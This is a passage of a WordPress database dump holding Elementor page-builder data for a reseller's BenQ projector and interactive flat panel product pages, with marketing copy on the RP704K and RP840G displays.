Support\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5fcf286\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fcf021\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"137f9bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Multiple Display Administrator (MDA)<\\/strong><\\/p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on\\/off times, which helps to create hassle-free maintenance.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61de455\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5d041e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-05.jpg\",\"id\":2829}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85858fd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"630131a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c81a461\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-06.jpg\",\"id\":2830}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d09571\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7562601\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EasySetting<\\/strong><\\/p><p>Install Android\\u2122 apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65cdaaa\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b1c982\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ce849b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Over-the-Air Update (OTA)<\\/strong><\\/p><p>Upgrade your displays with the latest BenQ firmware via BenQ\\u2019s OTA update support to keep them running smoothly at all times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5ce7f62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3400375\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-07.jpg\",\"id\":2831}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa35854\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"83a22ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4c554c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4918,1447,'_elementor_version','0.4'),(4920,2834,'_edit_lock','1569901024:1'),(4921,2834,'_edit_last','1'),(4974,2834,'_elementor_edit_mode','builder'),(4923,2834,'_elementor_template_type','post'),(4924,2835,'_elementor_edit_mode','builder'),(4925,2835,'_elementor_template_type','post'),(4926,2834,'_wp_page_template','template-fullwidth.php'),(4927,2834,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Projectors<\\/h1><h3>\\u00a0<\\/h3><h2>Business Projector (Smart Design for Presentations)<\\/h2><h3>High Brightness for Well-Lit Rooms<\\/h3><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><p>\\u00a0<\\/p><h2>Interactive Classroom Projectors<\\/h2><h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h3><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3>\\u00a0<\\/h3><h2>Interactive Flat Panel<\\/h2><h3>Meeting Room &amp; Boardroom<\\/h3><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><p>\\u00a0<\\/p><h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h3><h5>Work Collaboratively and Conduct Business Efficiently<\\/h5><p>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>\\u00a0<\\/h4><h5>How BenQ Display turns meeting rooms into places of efficiency<\\/h5><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>\\u00a0<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4928,2836,'_elementor_edit_mode','builder'),(4929,2836,'_elementor_template_type','post'),(4930,2836,'_wp_page_template','default'),(4931,2836,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BenQ<\\/h3><h3><u>Projectors<\\/u><\\/h3><h3>Business Projector (Smart Design for Presentations)<\\/h3><h4>High Brightness for Well-Lit Rooms<\\/h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><h3>Interactive Classroom Projectors<\\/h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3><u>Interactive Flat Panel<\\/u><\\/h3><h4>Meeting Room &amp; Boardroom<\\/h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h4><p><strong>Work Collaboratively and Conduct Business Efficiently<\\/strong><br \\/>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>How BenQ Display turns meeting rooms into places of efficiency<\\/h4><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5181,2885,'_hide_page_title',''),(5182,2885,'_hide_header',''),(5183,2885,'_hide_footer',''),(4933,2834,'_elementor_version','2.5.14'),(4971,2843,'_elementor_version','0.4'),(5000,1445,'_oembed_68e17de406f34eeab7014b6d9dccbe6f','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/zNkTopX68tk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(4980,2844,'_elementor_edit_mode','builder'),(4982,2845,'_elementor_template_type','post'),(4983,2845,'_wp_page_template','template-fullwidth.php'),(4984,2845,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BenQ<\\/h3><h3><u>Projectors<\\/u><\\/h3><h3>Business Projector (Smart Design for Presentations)<\\/h3><h4>High Brightness for Well-Lit Rooms<\\/h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><h3>Interactive Classroom Projectors<\\/h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3><u>Interactive Flat Panel<\\/u><\\/h3><h4>Meeting Room &amp; Boardroom<\\/h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h4><p><strong>Work Collaboratively and Conduct Business Efficiently<\\/strong><br \\/>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>How BenQ Display turns meeting rooms into places of efficiency<\\/h4><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4985,2845,'_elementor_version','0.4'),(4986,2845,'_elementor_edit_mode','builder'),(5184,2885,'_hide_breadcrumb',''),(5185,2885,'_cover',''),(5186,2885,'_show_excerpt',''),(4988,2848,'_wp_page_template','template-fullwidth.php'),(4989,2848,'_elementor_edit_mode','builder'),(4990,2848,'_elementor_template_type','post'),(4991,2848,'_elementor_data','[{\"id\":\"926e9aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dc7a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df626b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70\\u2019\\u2019\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"86ad24f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bd94d77\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f09a6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K UHD 70\\u2019\\u2019 Education Interactive Flat Panel Display | RP704K<\\/h4><p><strong>Your Caring Mate for Enhanced Interactive Learning<\\/strong><\\/p><p><br \\/>The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45957e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"776c1c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/Board-Management-1.png\",\"id\":2817}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"022d2bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1dc7d9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2005776\",\"elType\":\"widget\",\"settings\":{\"title\":\"Create a Healthy Learning Environment for Students\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c85d973\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0e86a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"879bd0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/edu-rp750k-21-1.png\",\"id\":2818}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e6f5604\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf641a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Germ-Resistant Screen<\\/strong><br \\/>The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silver\\u2019s antimicrobial feature remains effective even after thorough cleaning or long periods of use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"170aa2a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8471643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f2141cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>* TUV Test Confirmed<\\/strong><br \\/>TUV is the world\\u2019s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUV\\u2019s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screen\\u2019s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQ\\u2019s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"88d63dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9a92e2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f23907c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Smart Eye-Care Solution<\\/strong><\\/p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br \\/>*For Android devices, BenQ\\u2019s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f69235\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fa63930\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8a45b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>T\\u00dcV-Certified Low Blue Light Technology<\\/strong><\\/p><p><span style=\\\"font-size: 0.875rem;\\\">Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQ\\u2019s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cdbbd38\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9410e4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/low-bluelight.png\",\"id\":2819}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"678cc05\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"819463a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28220a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\",\"id\":2820}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ce9aeba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"91666dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anti-Glare Display<\\/strong><\\/p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704K\\u2019s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b52bca\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdf6ddc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"323737a\",\"elType\":\"widget\",\"settings\":{\"title\":\"EZWrite 4.1 : An Easy and Fun Annotation Solution\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d45294e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b36de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e1ec4b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Intelligent Handwriting Recognition<\\/strong><\\/p><p>The Smartboard RP704K\\u2019s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8dd3132\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36697a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-22.jpg\",\"id\":2822}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fa56a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0939589\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0acc085\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-01.jpg\",\"id\":2823}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"54da0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6ed8ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wireless Solution for Seamless Collaboration<\\/strong><\\/p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"07ba6b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"80e0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a6161d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>20-Point Multi-Touch Interactivity<\\/strong><\\/p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"200de74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d25d95e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-02.jpg\",\"id\":2824}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"900ab72\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3d86fe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"744c11b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Facilitate Teaching Flow with Friendly Design\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9fa4c57\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9912ac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ee788c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-08.png\",\"id\":2825}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ba4df64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Integrated Front-Facing Speaker and Pen Tray<\\/strong><\\/p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"776468e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e3a48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-09.png\",\"id\":2826}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e34662e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Account Management System for Personalized File Management<\\/strong><\\/p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f7a3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5caf9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d41625\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>NFC Pen<\\/strong><\\/p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2fd161\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fb3584\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-10.png\",\"id\":2827}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57d3c62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"751b521\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e35cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-04.jpg\",\"id\":2828}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"374a056\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec7b171\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Front Buttons<\\/strong> <br \\/>The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.<\\/p><p><strong>Instant Plug and Play<\\/strong> <br \\/>RP704K can save you from the hassles of complicated setup. Simply connect to a PC 